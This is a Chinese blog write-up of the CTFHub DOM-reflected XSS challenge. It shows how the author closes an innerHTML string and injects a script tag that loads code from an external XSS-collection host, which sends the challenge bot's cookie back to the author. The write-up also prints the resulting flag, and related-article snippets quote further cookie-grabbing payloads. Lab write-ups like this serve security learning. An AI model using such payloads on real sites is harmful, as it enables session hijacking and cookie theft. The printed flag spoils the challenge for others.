CTFHub XSS DOM反射 WriteUp

已于 2023-07-04 23:47:35 修改
阅读量2k 收藏 3
点赞数 3
分类专栏: CTF 文章标签: xss 前端 安全 网络安全 ctf web安全
于 2023-07-04 23:44:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49125123/article/details/131545561
版权

前言:本文需要注册一个xss平台,以接收xss反弹回来的数据,请自己在互联网上寻找合适的xss平台

在这里插入图片描述

1. 构造闭合语句

根据题目提示,判断网站存在DOM xss漏洞

查看页面源代码,发现关键位置,其中CTFHub is very niubility 是我们的可控范围

<script>
        $("#text")[0].innerHTML = 'CTFHub is very niubility';
</script>

尝试闭合标签,这里用VS Code,可以高亮显示代码

CTFHub is very niubility 替换成以下内容:

';</script></textarea>'"><script src=http://xsscom.com//IqT8eH></script>

在这里插入图片描述

把代码整理一下,可以看到 script 标签成功闭合,插入了新的代码。
在这里插入图片描述

2. xss反弹cookie

首先先在上面的输入框输入';</script></textarea>'"><script src=http://xsscom.com//IqT8eH></script>提交

然后复制网站URL,粘贴到下面的输入框提交

在这里插入图片描述

返回到xss平台,已经接收到数据,flag就在cookie信息里

ctfhub{9e7dd9be02df8a0ea2ea15c0}

在这里插入图片描述

提交flag,本道题成功解出

在这里插入图片描述

CVE-柠檬i
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
ctf xss利用_TCTF/0CTF2018 XSS Writeup
weixin_29923451的博客
01-14 475
作者:LoRexxar'@知道创宇404实验室刚刚4月过去的TCTF/0CTF2018一如既往的给了我们惊喜,其中最大的惊喜莫过于多道xss中Bypass CSP的题目,其中有很多应用于现代网站的防御思路。其中bl0g提及了通过变量覆盖来调用已有代码动态插入Script标签绕过strict-dynamicCSP的利用方式。h4xors.club2则是通过Script Gadgets和postmes...
反射xss攻击流量数据包
07-18
反射xss攻击流量数据包
CTFHUB-WEB-XSS-DOM反射
weixin_49539962的博客
08-08 294
但是在输入xss代码是要注意,我们可控的是“CTFHUB is very niubility”这句话,需要把这句话闭合后插入xss代码才能生效。和反射型是一样的,使用xss platform。
xss跨站攻击脚本概述
xu_1234567的博客
10-28 325
1.XSS 漏洞简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 xss攻击分为三类: (1)持久型跨站(存储型xss ):最直接的危害类型,跨站代码存储在服务器(数据库) (2)非持久型跨站(反射xss):反射型跨站脚本漏洞,最普
CTFHub XSS DOM跳转 WriteUp
柠檬i的博客
07-05 2116
跳转 XSS 的攻击方式涉及将恶意脚本嵌入到跳转链接或重定向 URL 中,以便在用户点击该链接或重定向时触发脚本的执行。攻击者可以利用跳转 XSS 攻击来进行会话劫持、盗取用户信息、篡改页面内容等恶意活动。 为了防止跳转 XSS 攻击,开发人员应该对用户输入的数据进行适当的验证、过滤和转义,以确保在将其嵌入到页面中之前进行正确的处理。此外,安全的编程实践和使用安全的开发框架也是防止跳转 XSS 的关键。
CTFHub-XSS-反射
m_de_g的博客
07-27 372
** CTFHub-XSS-反射型 ** http://challenge-413363e656833f13.sandbox.ctfhub.com:10800/?name=<script>alert(1)</script> 看到URL直接,在后面加上<script>aler(1)</script> 通过上述实验,发现确实存在反射XSS,接下来拿cookie <script>alert(document.cookie)</script&g
CTFHUB-WEB-XSS-反射
weixin_43486981的博客
08-13 3765
CTFHUB-WEB-XSS-反射型知识点:跨站脚本攻击XSS题目XSS platform平台 知识点:跨站脚本攻击XSS XSS允许恶意web用户将代码植入到提供给其它用户使用的页面中。 特点:能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话 类型: DOM型。属于反射型的一种,利用非法输入来闭合对应的html标签。数据流向是URL→浏览器。 存储型。危害大。相关源代码存放于服务器,用户浏览该页面时触发代码执行。 反射型。需要攻击者提前构造一个恶意链接来诱使客户点击。 防
ctfhub web全部做题记录(持续跟新)
01-08
CTF(Capture The Flag)】CTF是一种网络安全竞赛,其中参赛者通过解决各种安全问题来获取“旗标”(代表分数),这些问题通常涉及逆向工程、密码学、Web安全、取证分析等多个领域。 【Web安全Web安全是网络...
JQuery Dom XSS探测.html
05-15
可以直接测试网站里面的JQuery本地弹窗xss,属于渗透测试项一部分,此项目在xss中也属于高危,只需要替换里面的带测试链接即可。
XSS漏洞 DOM型测试 payload代码
02-26
XSS漏洞 DOM型测试 payload代码 这是测试跨脚本攻击是否有DOMXSS的漏洞,适合网络安全初学者进行测试。 跨脚本攻击漏洞是top10的一种。
CTFHub | webXSS反射型)
2301_76435948的博客
09-27 433
XSS反射型:URL地址当中的恶意参数直接被输出到页面中,导致攻击代码被触发。
CTFHubXSS漏洞_反射
Mitchell_Donovan的博客
04-20 1002
CTFHub_反射XSS 原题链接 key:反射XSS的注入与利用 ①原题界面如下???? 简单地尝试一下有无反射XSS漏洞,在第一个框内提交以下XSS弹窗语句???? <script>alert(1)</script> 发现成功弹窗,说明存在XSS漏洞 ②登陆平台XSSplatform,创建新项目???? 进行相关配置???? ③查看项目代码???? 这都不重要,在底部找到使用方法???? ④把其中一条攻击代码复制下
CTFHUB刷题 反射XSS攻击
null1024的博客
09-08 846
一、题目描述与分析 如上图, 进入题目页面,此时第一个框中是CTFHub,出现Hello,CTFHub 输入admin,发现出现变化,变为Hello,admin,可以考虑拼接位置 二、解题过程 输入以下代码,如图,点击Submit <script>alert(1)</script> 结果如图,说明拼接成功。 注册XSS平台,进行攻击,得到flag ...
CTFHUB——反射XSS详解
wuuconix's blog
09-01 7623
背景 本来看ctfhub上有xss的题目,打算好好学习一波,结果点开一看,只有一道题2333。 便现在dvwa上熟悉了一波。所谓反射型是相对于存储型来讲的。 如果黑客的xss注入是通过某种方式储存到了数据库中,那就是存储型的,这种xss的特点就是每次访问该页面都会收到xss攻击,因为js语句已经放在数据库里了。 而反射xss则不是这样,每次触发只能手动输入和点击才能触发。 我认为xss产生的原因主要是对便签审查不严格造成的。 dvwa xss例题 下面写一下dvwa中的三种难度的反射xss。 <?
CTFHubWebXSS(反射型)
Ynh323的博客
05-11 556
ctfhub平台,xss反射型详解
CTFHub技能书解题笔记-XSS-反射
qq_43006864的博客
12-24 1593
打开题目 来个最常规的试试。 好像没思路了。看到第二行是说发送url去bot,第一行是你的名字。那我试试第二行放url。 返回了successfully。 然后没思路了。去看了大佬的wp,好像用到了xss平台,注册一个试试。 XSS平台 - (支持http/https)XSS Platform 这里我用的这个。 开始测试。注册完成后,创建项目。 这里随便√,默认的就够用了。 这里我们选择红框里的这一条,进行测试。 就贴在?name=后面...
CTFXSS浅谈(xsslabs)
最新发布
glass_york的博客
10-07 578
主要针对XSS入门和XSSLABS前7关挑战
CTFweb方向的XSS
cutesharkl的博客
07-13 686
XSS概述:XSS是一种Web安全漏洞,它允许攻击者将恶意脚本注入到受害者的Web应用程序中,从而在用户的浏览器中执行该脚本。这种攻击可以导致各种问题,包括窃取用户登录凭据、会话劫持、网页篡改等。
CTFhub XSS技能树DOM
07-29
XSS (Cross-Site Scripting) 是一种常见的网络安全漏洞,攻击者通过在网页中注入恶意脚本来实施攻击。DOM (Document Object Model) 是一种用于表示和操作网页文档的编程接口。 在 CTFhub 中,XSS 技能树涵盖了多个与 XSS 相关的知识点和攻击场景。以下是一些可能包含在 XSS 技能树中的主题: 1. XSS 基础知识:深入理解 XSS 的原理、类型和危害。 2. 攻击载体:了解常见的 XSS 攻击载体,如 HTML、JavaScript、CSS、URL 参数等。 3. 攻击向量:学习常见的 XSS 攻击向量,如存储型、反射型和 DOMXSS。 4. 编码技巧:掌握对恶意脚本进行编码和绕过防护机制的技巧。 5. 攻击场景:了解在不同的应用场景下如何利用 XSS 漏洞进行攻击,如登录表单、搜索功能等。 6. 防御措施:学习如何预防和修复 XSS 漏洞,包括输入验证、输出编码、CSP (Content Security Policy) 等。 这只是一个简单的示例,实际的 XSS 技能树可能会更加详细和全面。在学习 XSS 技能树时,你可以通过阅读相关的文档、参与挑战和实践来提高自己的技能。记住,安全意识和代码审计能力也是成为一名优秀的安全工程师的重要因素。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值